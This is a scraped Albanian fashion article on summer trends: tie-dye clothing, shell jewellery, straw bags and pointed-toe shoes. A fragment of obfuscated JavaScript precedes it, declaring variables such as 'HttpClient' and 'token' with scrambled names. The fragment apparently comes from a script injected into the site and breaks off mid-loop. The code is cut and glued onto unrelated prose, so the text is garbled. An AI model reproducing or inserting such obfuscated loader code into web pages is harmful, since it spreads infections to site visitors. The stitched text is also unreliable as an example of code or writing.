;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Këto trende do t’i shihni gjithandej gjatë verës

By

Vera nuk është vetëm për fustanet verorë dhe bikinet. Është stinë e cila na lejon të eksperimentojmë edhe me stile të ndryshme dhe trende të reja.

Rroba laramane

Këto lloj rrobash që lidhen në nyje dhe zhyten në ngjyrë, janë trendi për këtë verë. Një stil pak më i thjeshtë po interesante në të njëjtën kohë.

 

Bizhuteri suvenir

Guaca guaca.. dhe tani po i përdorim si aksesorë për flokë dhe bizhuteri. Kur sheh për herë të parë të japin përshtypjen e suvenireve që blejmë në vende bregdetare. Po pa dyshim këto janë trendi i kësaj vere.

Çanta e kashtës

Çantat për shumë njerëz janë ato që kompletojnë një dukje në mënyrë perfekte. Ata njerëz janë më se korrekt! Këtë verë trendi është i gjithi për cantat e kashtës në të gjitha dizajnet dhe format e bukura.

Këpucë me maje të drejtë

Kur shohim në mëndje na vinë këpucët e mamasë sonë kur ishte e re. Ndoshta mamaja juaj ka një palë këpucë të tilla në papafingon e saj më shpresën që “do të kthehet moda”.Trendi i këpucëve të kësaj vere është maja e drejtë dhe kombinuar me një fustan veror pa dyshim që do të dukeni shumë bukur.

Artikuj të ngjashëm